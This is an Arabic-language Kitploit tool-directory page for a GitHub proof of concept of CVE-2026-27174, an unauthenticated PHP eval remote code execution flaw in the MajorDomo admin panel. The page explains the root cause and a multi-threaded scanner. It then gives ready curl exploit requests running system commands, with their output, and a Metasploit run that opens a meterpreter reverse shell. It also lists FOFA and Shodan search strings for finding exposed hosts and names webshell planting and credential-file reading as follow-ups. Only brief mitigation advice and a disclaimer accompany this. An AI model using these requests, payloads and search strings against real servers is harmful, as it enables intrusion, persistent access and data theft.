Skip to content
KitploitKITPLOIT
أدواتعمليات الاستغلالالمدونة
Log in
إرسال
أدواتعمليات الاستغلالالمدونة
إرسال

أدوات الاختراق واختبار الاختراق والأمن السيبراني لترسانتك الأمنية!

Kitploit هو دليل لأدوات الاختراق والأمن السيبراني واختبار الاختراق. اكتشف آخر تحديثات المشاريع للعثور على الثغرات وتحليل الأنظمة وأتمتة الاختبارات وتعزيز أمنك.

··الخلاصات·اتصال·الخصوصية·© 2026 Kitploit

دليل الأدوات

الفئات

عرض جميع الفئات
Loading categories
majordomo-CVE-2026-27174-poc — CVE-2026-27174 - تنفيذ تعليمات برمجية عن بُعد بدون مصادقة عبر ميزة وحدة تحكم PHP في لوحة الإدارة | Kitploit
أدوات/GitHubGitHub/maxmnml/majordomo-cve-2026-27174-poc
ماسحات الثغرات الأمنيةالاستغلالاستغلال تطبيقات الويبأمن الويباختبار الاختراق
GitHubmaxmnml/majordomo-cve-2026-27174-poc

majordomo-CVE-2026-27174-poc

CVE-2026-27174 - تنفيذ تعليمات برمجية عن بُعد بدون مصادقة عبر ميزة وحدة تحكم PHP في لوحة الإدارة

عرض المستودع
4منذ 7 أشهرلم تتم المراجعة بعد

الأكثر شعبية

عرض الكل →

اكتشف الأدوات الأكثر استخدامًا من قبل مجتمعنا.

استكشف جميع الأدوات

تصفح مجموعتنا من الأدوات

عرض جميع الأدوات →
مشاركة

majordomo-CVE-2026-27174-poc

إثبات مفهوم (Proof-of-Concept) يستغل ثغرة تنفيذ كود عن بُعد دون مصادقة عبر ميزة وحدة تحكم PHP في لوحة الإدارة ضمن MajorDomo (Major Domestic Module).

الثغرة

تعرّض لوحة إدارة MajorDoMo وحدة تحكم لتقييم PHP عبر /admin.php. ونظرًا لغياب استدعاء exit بعد إعادة توجيه المصادقة في panel.class.php، يتم تضمين معالج AJAX المسمى inc_panel_ajax.php بشكل غير مشروط — مما يجعل دالة eval() الخاصة به في متناول أي طلب HTTP غير مصادَق.

يمكن للمهاجم تنفيذ كود PHP تعسفي عبر طلب GET واحد فقط، دون الحاجة إلى بيانات اعتماد، أو وصول مسبق، أو أي تفاعل من الضحية.

الإصدارات المتأثرة

  • جميع إصدارات MajorDomo السابقة لتصحيح 18 فبراير 2026.

ماسح الكشف

scan.py هو ماسح متعدد الخيوط وغير مدمر يكتشف المضيفين المعرضين لثغرة CVE-2026-27174 دون تنفيذ أي حمولة ضارة.

كيف يعمل

يعمل الماسح عبر ثلاث مراحل متتابعة لكل هدف:

Phase 1 — RCE Confirmation
  └─ Sends: echo 'random_marker';
  └─ Checks: marker is reflected in the response body
  └─ Confirms: eval() is reachable without authentication

Phase 2 — PHP Sandbox Profiling
  └─ Sends: echo 'marker:' . ini_get('disable_functions');
  └─ Extracts: list of disabled PHP functions on the server

Phase 3 — OS Execution Surface
  └─ Probes: system, exec, shell_exec, passthru via function_exists()
  └─ Classifies: impact level as HIGH or MEDIUM

يتم توليد علامة أبجدية رقمية عشوائية لكل طلب لتجنب النتائج الإيجابية الخاطئة الناتجة عن التخزين المؤقت أو جدران حماية الويب (WAFs) أو تلوث الاستجابة.

الاستخدام

المتطلبات

pip install requests

1. تجهيز ملف الأهداف

أنشئ ملف targets.txt بحيث يحتوي كل سطر على IP:PORT واحد:

192.168.1.10:8080
10.0.0.5:80
10.0.0.12:443
# lines starting with # are ignored
# only IP:PORT format is accepted

2. تشغيل الماسح

python3 scan.py targets.txt

المخرجات

[+] RCE PHP CONFIRMED -> http://192.168.1.10:8080/admin.php
[-] Not vulnerable -> 10.0.0.5:80

[+] Vulnerable targets exported to results.json

ملف results.json

يتم إنشاؤه تلقائيًا عند العثور على مضيف معرّض واحد على الأقل:

[
    {
        "target": "192.168.1.10:8080",
        "url": "http://192.168.1.10:8080/admin.php",
        "rce_php": true,
        "disable_functions": "popen,pclose,proc_open",
        "system_functions_available": ["system", "exec"],
        "impact_level": "HIGH"
    }
]
الحقلالوصف
targetعنوان IP:PORT الذي تم فحصه
urlالرابط الكامل الذي تم فيه تأكيد RCE
rce_phpتأكيد تنفيذ كود PHP (يكون دائمًا true في النتائج)
disable_functionsإعداد PHP disable_functions على الخادم (null إذا كان فارغًا)
system_functions_availableدوال تنفيذ أوامر نظام التشغيل التي يمكن للمهاجم استدعاءها
impact_levelHIGH (تنفيذ أوامر نظام التشغيل متاح) أو MEDIUM (RCE عبر PHP فقط)

الاستغلال

استنادًا إلى قيمة الحقل system_functions_available في ملف result.json، يمكننا صياغة طلب GET باستخدام دالة (أو دوال) النظام لاستغلال ثغرة RCE:

curl http://192.168.1.10:8080/admin.php?ajax_panel=1&op=console&command=echo+exec('id');
#or
curl http://192.168.1.10:8080/admin.php?ajax_panel=1&op=console&command=echo+system('id');

uid=33(www-data) gid=33(www-data) groups=33(www-data)

الأتمتة

وحدة Metasploit:

msfconsole
use exploit/multi/http/majordomo_console_eval_rce
set RHOSTS 192.168.1.10
set RPORT 8080
set PAYLOAD php/meterpreter/reverse_tcp
set LHOST 172.17.0.1
check #Verify it returns Vulnerable
run #Verify a Meterpreter session opens as www-data

في البرية

FOFA:

title="MajorDomoSL"

SHODAN:

http.title:"MajorDomoSL"

الأثر

يمكن لمهاجم عن بُعد دون مصادقة أن:

  • ينفذ كود PHP تعسفي على الخادم
  • يقرأ ملفات حساسة (/etc/passwd, ملفات الإعدادات, بيانات الاعتماد)
  • يكتب قشور ويب PHP (webshells) لضمان وصول مستمر
  • ينتقل إلى تنفيذ أوامر على مستوى نظام التشغيل إذا لم تكن دوال PHP التالية معطلة: system أو exec أو shell_exec أو passthru

يعتمد الأثر الفعلي على إعداد disable_functions في PHP على الخادم:

السيناريومستوى الأثرالوصف
عدم وجود disable_functionsCRITICALتنفيذ أوامر كامل على مستوى نظام التشغيل
قيود جزئيةHIGHRCE عبر PHP + تنفيذ جزئي لأوامر نظام التشغيل
disable_functions يمنع جميع دوال التنفيذMEDIUMRCE عبر PHP فقط (قراءة/كتابة الملفات، تسريب البيانات)

CVSS 4.0 - 9.3 CRITICAL — CVSS:4.0/AV:N/AC:L/AT:N/PR:N/UI:N/VC:H/VI:H/VA:H/SC:N/SI:N/SA:N

CVSS 3.1 - 9.8 CRITICAL — CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H

المعالجة والتخفيف

حدِّث إلى أحدث إصدار من MajorDomo (Major Domestic Module).

الإجراءيمنع RCEيمنع تنفيذ أوامر نظام التشغيل
تطبيق تصحيح 18 فبراير 2026✅✅
قائمة السماح عبر جدار الحماية/عناوين IP على /admin.php✅✅
تحصين إعداد disable_functions❌✅

المراجع

https://chocapikk.com/posts/2026/majordomo-revisited

https://nvd.nist.gov/vuln/detail/CVE-2026-27174

https://github.com/sergejey/majordomo/pull/1177

إخلاء المسؤولية

هذه الأداة مخصصة لاختبارات الأمن المصرح بها فقط. الوصول غير المصرح به إلى أنظمة الكمبيوتر غير قانوني.

تنزيل الأداة